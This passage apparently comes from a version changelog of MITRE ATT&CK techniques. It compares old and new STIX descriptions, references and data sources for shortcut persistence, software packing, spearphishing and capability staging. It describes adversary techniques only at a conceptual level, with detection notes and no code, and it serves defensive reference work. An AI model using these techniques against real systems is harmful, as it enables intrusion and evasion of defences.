name="filename.extension" loadFrom="fully-qualified or relative pathname">` in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.<br>Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, malware may execute shared modules to load additional components or features. |
| x_mitre_data_sources[0] | Process: OS API Execution | Module: Module Load |
| x_mitre_data_sources[1] | Module: Module Load | Process: OS API Execution |
| Old Description | New Description |
|---|---|
| Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program. | Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.(Citation: Shortcut for Persistence ) Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://attack.mitre.org/techniques/T1036) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program. Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://attack.mitre.org/techniques/T1176)) to persistently launch malware. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Elastic. (n.d.). Shortcut File Written or Modified for Persistence. Retrieved June 1, 2022. | |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-132 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-13 21:30:24.555000+00:00 | 2022-10-19 22:29:46.175000+00:00 |
| description | Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program. | Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.(Citation: Shortcut for Persistence ) Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://attack.mitre.org/techniques/T1036) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program. Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://attack.mitre.org/techniques/T1176)) to persistently launch malware. |
| external_references[1]['source_name'] | capec | Shortcut for Persistence |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/132.html | https://www.elastic.co/guide/en/security/7.17/shortcut-file-written-or-modified-for-persistence.html#shortcut-file-written-or-modified-for-persistence |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/132.html', 'external_id': 'CAPEC-132'} | |
| x_mitre_data_sources | Process: Process Creation | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation | |
| Description |
|---|
| Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-29 16:05:00.456000+00:00 | 2022-01-29 00:02:24.150000+00:00 |
| x_mitre_data_sources[0] | Firewall: Firewall Metadata | Process: OS API Execution |
| x_mitre_data_sources[2] | Process: Process Creation | Command: Command Execution |
| x_mitre_data_sources[3] | Command: Command Execution | Firewall: Firewall Metadata |
| x_mitre_data_sources[4] | Process: OS API Execution | Process: Process Creation |
| Old Description | New Description |
|---|---|
| Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses. | Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Alexandre D'Hondt. (n.d.). Awesome Executable Packing. Retrieved March 11, 2022. | |
| external_references | CAPEC-570 | |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-570 | |
| external_references | Executable compression. (n.d.). Retrieved December 4, 2014. | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 13:56:47.154000+00:00 | 2022-04-19 02:09:27.046000+00:00 |
| description | Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses. | Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing) |
| external_references[1]['source_name'] | capec | Awesome Executable Packing |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/570.html | https://github.com/dhondta/awesome-executable-packing |
| external_references[3]['source_name'] | Wikipedia Exe Compression | capec |
| external_references[3]['url'] | http://en.wikipedia.org/wiki/Executable_compression | https://capec.mitre.org/data/definitions/570.html |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | Linux | |
| Old Description | New Description |
|---|---|
| Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017) | Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").(Citation: CISA IDN ST05-016) Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021) |
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. | |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-163 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-14 14:38:42.715000+00:00 | 2022-10-21 16:01:45.500000+00:00 |
| description | Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017) | Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").(Citation: CISA IDN ST05-016) Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021) |
| external_references[1]['source_name'] | capec | ACSC Email Spoofing |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/163.html | https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf |
| external_references[2]['source_name'] | Trend Micro Pawn Storm OAuth 2017 | CISA IDN ST05-016 |
| external_references[2]['description'] | Hacquebord, F. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019. | CISA. (2019, September 27). Security Tip (ST05-016): Understanding Internationalized Domain Names. Retrieved October 20, 2020. |
| external_references[2]['url'] | https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks | https://us-cert.cisa.gov/ncas/tips/ST05-016 |
| external_references[3]['source_name'] | Microsoft Anti Spoofing | Trend Micro Pawn Storm OAuth 2017 |
| external_references[3]['description'] | Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020. | Hacquebord, F. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019. |
| external_references[3]['url'] | https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide | https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks |
| external_references[4]['source_name'] | ACSC Email Spoofing | Microsoft OAuth 2.0 Consent Phishing 2021 |
| external_references[4]['description'] | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. | Microsoft 365 Defender Threat Intelligence Team. (2021, June 14). Microsoft delivers comprehensive solution to battle rise in consent phishing emails. Retrieved December 13, 2021. |
| external_references[4]['url'] | https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf | https://www.microsoft.com/security/blog/2021/07/14/microsoft-delivers-comprehensive-solution-to-battle-rise-in-consent-phishing-emails/ |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Content | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[2] | Network Traffic: Network Traffic Flow | Network Traffic: Network Traffic Content |
| x_mitre_detection | URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) Because this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs. | URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites as well as links redirecting to adversary infrastructure, based upon suspicious OAuth patterns with unusual TLDs.(Citation: Microsoft OAuth 2.0 Consent Phishing 2021) Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) Because this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs. |
| x_mitre_version | 2.1 | 2.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Microsoft Anti Spoofing', 'description': 'Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.', 'url': 'https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/163.html', 'external_id': 'CAPEC-163'} | |
| x_mitre_contributors | Kobi Haimovich, CardinalOps | |
| x_mitre_contributors | Menachem Goldstein | |
| Old Description | New Description |
|---|---|
| Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. | Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-15 03:42:26.537000+00:00 | 2022-10-21 16:01:47.611000+00:00 |
| description | Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. | Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. |
| external_references[1]['source_name'] | TrendMictro Phishing | ACSC Email Spoofing |
| external_references[1]['description'] | Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved October 20, 2020. | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. |
| external_references[1]['url'] | https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html | https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf |
| external_references[2]['source_name'] | PCMag FakeLogin | TrendMictro Phishing |
| external_references[2]['description'] | Kan, M. (2019, October 24). Hackers Try to Phish United Nations Staffers With Fake Login Pages. Retrieved October 20, 2020. | Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved October 20, 2020. |
| external_references[2]['url'] | https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages | https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html |
| external_references[3]['source_name'] | Microsoft Anti Spoofing | PCMag FakeLogin |
| external_references[3]['description'] | Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020. | Kan, M. (2019, October 24). Hackers Try to Phish United Nations Staffers With Fake Login Pages. Retrieved October 20, 2020. |
| external_references[3]['url'] | https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide | https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages |
| external_references[4]['source_name'] | ACSC Email Spoofing | Microsoft Anti Spoofing |
| external_references[4]['description'] | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. | Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020. |
| external_references[4]['url'] | https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf | https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide |
| x_mitre_data_sources[0] | Application Log: Application Log Content | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Content | Application Log: Application Log Content |
| x_mitre_version | 1.1 | 1.3 |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Menachem Goldstein |

| Old Description | New Description |
|---|---|
| Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020) Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to): * Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox) * Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) * Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020) * Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert) | Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting.<br>To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.(Citation: Volexity Ocean Lotus November 2020)(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing) Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to): * Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox) * Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) * Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020) * Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 16:28:41.815000+00:00 | 2022-10-19 22:01:05.551000+00:00 |
| description | Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020) Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to): * Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox) * Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) * Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020) * Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert) | Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting.<br>To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.(Citation: Volexity Ocean Lotus November 2020)(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing) Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to): * Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a 